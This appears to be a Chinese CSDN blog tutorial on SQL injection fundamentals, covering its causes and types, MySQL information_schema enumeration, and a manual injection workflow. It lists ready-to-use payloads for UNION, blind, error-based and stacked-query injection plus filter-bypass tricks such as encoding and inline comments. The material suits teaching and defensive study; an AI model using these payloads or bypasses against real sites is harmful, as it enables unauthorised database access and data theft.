SQL注入之基础原理

最新推荐文章于 2024-02-22 14:08:22 发布
最新推荐文章于 2024-02-22 14:08:22 发布
阅读量5.8k 收藏 20
点赞数 7
分类专栏: 数据库 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longtangbin/article/details/109093092
版权

SQL注入之基础原理

一、SQL注入的产生

SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

二、SQL注入原理

SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。基于此,SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处理不当。

三、SQL注入的类型

常见的SQL注入有以下几种:

  • 按变量类型分类
  • 数字型
  • 字符型
  • 按HTTP提交方式分类
  • GET型注入
  • POST型注入
  • Cookie注入
  • HTTP头部注入
  • 按注入方式分类
  • 报错注入
  • 盲注
  • UNION注入
  • 布尔型注入
  • 时间注入
  • 宽字节注入(主要针对GBK编码类型)
四、数据库

常见数据库类型:
MYSQL:

MySQL5.0之后和5.0之前版本有很大的区别,,MySQL5.0以上存在一个存储着数据库信息的信息数据库–INFORMATION_SCHEMA ,其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。 而5.0以下没有。

information_schema

系统数据库,记录当前数据库的数据库,表,列,用户权限等信息

SCHEMATA

储存mysql所有数据库的基本信息,包括数据库名,编码类型路径等

TABLES

储存mysql中的表信息,包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等

COLUMNS

储存mysql中表的列信息,包括这个表的所有列以及每个列的信息,该列是表中的第几列,列的数据类型,列的编码类型,列的权限,列的注释等

MSSQL:

注入靠比大小。

Oracle:

Oracle的数据类型是强匹配的(MySQL有弱匹配的味道),所以在Oracle进行类似UNION查询数据时候必须让对应位置上的数据类型和表中的列的数据类型是一致的,也可以使用null代替某些无法快速猜测出数据类型的位置。

PostgreSQL:

PostgreSQL是一款关系型数据库,广泛应用在Web编程当中,由于其语法与MySQL不尽相同,所以其SQL注入又自成一派。

Access:

没有库结构,只有表和列,只能通过字典爆破。

五、基于手工注入流程

要从select语句中获取有用的信息,必须确定该数据库中的字段数和那个字段能够输出,这是前提。

1. MySQL >= 5.0

获取字段数
order by n /通过不断尝试改变n的值来观察页面反应确定字段数/

获取系统数据库名
在MySQL >5.0中,数据库名存放在information_schema数据库下schemata表schema_name字段中
select null,null,schema_name from information_schema.schemata

获取当前数据库名
select null,null,...,database()

获取数据库中的表
select null,null,...,group_concat(table_name) from information_schema.tables where table_schema=database()select null,null,...,table_name from information_schema.tables where table_schema=database() limit 0,1

获取表中的字段
这里假设已经获取到表名为user
select null,null,...,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'

获取各个字段值
这里假设已经获取到表名为user,且字段为username和password
select null,group_concat(username,password) from users

2. MySQL < 5.0

MySQL < 5.0 没有信息数据库information_schema,所以只能手工枚举爆破(二分法思想)。
该方式通常用于盲注。
相关函数
length(str) :返回字符串str的长度
substr(str, pos, len) :将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始
mid(str,pos,len) :跟上面的一样,截取字符串
ascii(str) :返回字符串str的最左面字符的ASCII代码值
ord(str) :将字符或布尔类型转成ascll码
if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0

基于布尔的盲注
and ascii(substr((select database()),1,1))>64 /判断数据库名的第一个字符的ascii值是否大于64/

基于时间的盲注
id=1 union select if(SUBSTRING(user(),1,4)='root',sleep(4),1),null,null /提取用户名前四个字符做判断,正确就延迟4秒,错误返回1/
六、常用注入方式
注释符:
#(有空格)或–+
/**/

内联注释:
/*!...*/

union注入
id =-1 union select 1,2,3 /获取字段/

Boolean注入
id=1' substr(database(),1,1)='t'--+ /判断数据名长度/

报错注入
floor()和rand()
union select count(*),2,concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a /利用错误信息得到当前数据库名/

extractvalue()
id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))

updatexml()
id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))

geometrycollection()
id=1 and geometrycollection((select * from(select * from(select user())a)b))

multipoint()
id=1 and multipoint((select * from(select * from(select user())a)b))

polygon()
id=1 and polygon((select * from(select * from(select user())a)b))

multipolygon()
id=1 and multipolygon((select * from(select * from(select user())a)b))

linestring()
id=1 and linestring((select * from(select * from(select user())a)b))

multilinestring()
id=1 and multilinestring((select * from(select * from(select user())a)b))

exp()
id=1 and exp(~(select * from(select user())a))

时间注入
id = 1 and if(length(database())>1,sleep(5),1)

堆叠查询注入
id = 1';select if(sub(user(),1,1)='r',sleep(3),1)%23

二次注入
七、SQL注入绕过技术
大小写绕过
双写绕过
编码绕过(url全编码、十六进制)
内联注释绕过
关键字替换
逗号绕过
substr、mid()函数中可以利用from to来摆脱对逗号的利用;
limit中可以利用offset来摆脱对逗号的利用
比较符号( >< )绕过(greatest、between and)
逻辑符号的替换(and=&& or=|| xor=| not=!)
空格绕过(用括号,+等绕过)
等价函数绕过
hex()、bin()=ascii()
concat_ws()=group_concat()
mid()、substr()=substring()
http参数污染
(id=1 union select+1,2,3+from+users+where+id=1–变为id=1 union select+1&id=2,3+from+users+where+id=1–)
缓冲区溢出绕过
(id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36–+
其中0xAAAAAAAAAAAAAAAAAAAAA这里A越多越好。。一般会存在临界值,其实这种方法还对后缀名的绕过也有用)

--------------------------------------------- END -------------------------------------------

别給朕装纯
关注
  • 7
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入基础.pdf
07-05
介绍SQL注入原理,常见入侵与防御方式,手工注入或者工具注入
sql注入原理简介
08-26
一、什么是sql注入? 二、sql注入产生原因 三、sql注入原理 四、sql注入共计的简单示例
SQL注入基础和进阶.pdf
12-26
SQL注入基础和进阶
sql注入是什么,是如何产生
最新发布
slty_123的博客
02-22 390
SQL注入产生原因通常可以归结为以下几点:不当的类型处理:应用程序未能对用户输入的数据进行正确的类型处理,导致攻击者可以插入恶意的SQL代码。不合理的查询集处理:应用程序在构建SQL查询语句时,未能对用户输入的数据进行充分的验证和过滤,导致攻击者可以插入恶意的SQL代码。此外,应用程序还应该对数据库的错误信息进行适当的处理,避免泄露敏感信息给攻击者。SQL注入SQL Injection)是一种常见的网络攻击手段,它通过在应用程序的输入字段中插入恶意的SQL代码,从而欺骗服务器执行非法的数据库操作。
一文给你讲明白SQL注入原理
JavaEdge全是干货的技术号
12-03 1528
sql注入是一种网络攻击,持久层框架都会自己处理该问题,所以日常开发感觉不到,但是为了面试我们还是得熟悉。 原理sql代码伪装到输入参数,传递到服务器解析并执行的一种攻击手法。 即在一些对server端发起的请求参数中植入一些sql代码,server端在执行sql操作时,会拼接对应参数,同时也将一些sql注入攻击的“sql”拼接起来,导致会执行一些预期之外的操作。 案例 在登录界面包括用户名和密码输入框,以及提交按钮,输入用户名和密码,提交。 登录时调用接口/user/login/ 加上参数userna
【超详细版】学习SQL注入看这篇就够了(原理及思路绕过)
MachineGunJoe666
04-27 3337
当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
SQL注入原理
热门推荐
qq_44754481的博客
03-17 1万+
一、SQL注入原理 SQL注入就是把SQL命令插入到Web表单然后提交到所在页面请求(查询字符串),从而达到欺骗服务器执行恶意的SQL命令。 它是利用现在已有的应用程序,将SQL语句插入到数据库中执行,执行一些并非按照设计者意图的SQL语句。 产生原因: 产生原因是程序没有细致过滤用户输入的数据,从而导致非法数据进入系统。 二、相关技术原理SQL注入可以分为平台层注入和代码注入。前者是由不安全...
SQL注入原理
weixin_45634365的博客
02-24 2773
一、SQL注入的本质 注入攻击的本质,是把用户输入的数据当做代码执行。 SQL:结构化查询语言,即操作数据库的代码 注入:把用户输入的数据当做代码执行 SQL注入的条件: 第一个是用户能够控制输入。 第二个是原本程序要执行的代码,拼接了用户输入的数据然后进行执行 SQL注入的应用场景: 任何和数据库交互的传参(任何传参点) 想要了解更详细一点,可以看一下这篇博客:SQl注入与正则表达式 二、显错注入 1、判断是否存在注入点 http://59.1.1.1/?id=1 #?代表GET传参,传参值为1 (1)
习科SQL注入自学指南
06-20
SQL注入自学指南主要是基于习科前段时间对论坛以及网络安全圈内的从业者、爱好者的对学习材料的调查,大家普遍希望习科能开放基础学习资料的电子书下载 应广大会员的号召,同时秉承技术自由、技术创新、技术共享、技术进步的原则,开放习科论坛最基础的学习材料《SQL注入自学指南》 依照圈内的“潜规则”惯例,通常都是先扯一些互联网蓬勃发展,再高谈阔论一番开起来高大上的见解,趁机再显摆一些看似晦涩难懂的专业术语。而《SQL注入自学指南》全部取材于习科论坛(BlackBap.Org),在技术上直奔主题,从简单到复杂一步一步深入剖析,适合从零基础开始学习的新手。 这本书汇总了习科论坛近几年关于SQL注入的精华帖子,从基础原理到高级技巧,由编者精心编排,深入浅出,讲解SQL注入的基本原则以及各种高级利用技巧,每个知识点均已实际例子作为示范,更加真实,告别纸上谈兵。
防范SQL注入的应用分析
04-16
由于各种Web服务器的漏洞与程序的非严密性,导致针对Web服务器的脚本攻击事件日益增多,其大多是通过ASP或PHP等脚本注入作为主要的攻击手段, Web站点迅速膨胀的今天,基于两者的SQL注入也慢慢成为目前攻击的主流方式。文中简要介绍了SQL注入攻击的概念和原理,以及SQL注入攻击的特点和实现过程,并在此基础上叙述了如何检测SQL注入攻击,总结了一般的SQL注入攻击的防范方法.
PHP的SQL注入过程分析
12-19
今天从网上学习了有关SQL注入的基本技能。SQL注入的重点就是构造SQL语句,只有灵活的运用SQL   语句才能构造出牛比的注入字符串。学完之后写了点笔记,已备随时使用。希望你在看下面内容时先了   解SQL的基本原理。笔记中的代码来自网络。   ===基础部分===   本表查询:   http://127.0.0.1/injection/user.php?username=angel’ and LENGTH(password)=’6   http://127.0.0.1/injection/user.php?username=angel’ and LEFT(password,1)=’m  
SQL注入攻击原理分析及JavaWeb环境下的防范措施.pdf
07-23
网络的广泛应用给社会带来极大便捷,网络安全特别是SQL 注入也成为了一个倍受关注的问题。与此同时,Java Web 由于其平台无关性、“一次编写、随处运行”,使得越来越多的程序员加入到Java 当中。本文在分析了SQL 注入原理基础上,提出了几点Java Web 环境下防范措施。   随着Ineternet 技术的迅猛发展,为了能更充分地使用互联网这个世界上最大的交流平台,许多单位或个人纷纷建立自己的网站。但是网络为企业提供了新的机遇,但是同时它也给安全、性能等领域带来了新的风险。而SQL 注入就是众多风险中较为常见的一种。   SQL 注入是从正常的WWW 端口访问,而且表面看起来跟一般的Web 页面访问没什么区别,所以目前市面的防火墙都不会对SQL 注入发出警报,如果管理员没查看日志的习惯,可能被入侵很长时间都不会发觉。   其实SQL 注入主要还是一些程序员的水平及经验参差不齐,没有对用户输入数据的合法性进行判断。使应用程序存在安全隐患,任何用户可以提交一段数据库查询代码,并根据程序返回的结果,获得某些他想得知的数据,造成用户可以在输入中包含恶意代码篡改程序功能。更严重的用户还可能窃取最高管理权限,删除数据库中所有的数据。
sql注入原理
10-28
sql注入原理!!!!
SQL注入基础知识
01-18
SQL注入基础知识的学习,可以对你有很大的帮助,避免在开发过程中出现更多的安全问题
sql注入内联注释原理
08-10
内联注释是一种用于绕过SQL注入防御措施的技术。内联注释的基本原理是在注入攻击中将恶意的SQL代码嵌入到正常的SQL语句中,并使用特殊的注释语法来绕过输入过滤和验证。在引用中提到的例子中,/*!UNION*/ /*!SELECT*/是用来实现联合查询的注释,它可以绕过一些安全检测。通过使用内联注释,攻击者可以修改查询的结构和逻辑,从而获取未授权的数据或执行恶意操作。 需要注意的是,内联注释只是SQL注入的一种技术手段之一,SQL注入还有其他类型和方法。基于不同的漏洞和攻击场景,SQL注入可以分为平台层注入和代码层注入。平台层注入是由不安全的数据库配置或数据库平台的漏洞所致,而代码层注入则主要是由于程序员对输入未进行细致的过滤和验证。 总之,内联注释是SQL注入攻击中常用的一种技术手段,通过在注入攻击中使用特殊的注释语法来绕过输入过滤和验证,从而修改查询的结构和逻辑。这种注释技术可以用于各种类型的SQL注入攻击。123 #### 引用[.reference_title] - *1* [Web安全原理剖析(一)——SQL注入原理](https://blog.csdn.net/qq_25505167/article/details/120063391)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] - *2* [SQL注入介绍](https://blog.csdn.net/m0_50879937/article/details/127037856)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] - *3* [SQL注入基础原理](https://blog.csdn.net/longtangbin/article/details/109093092)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值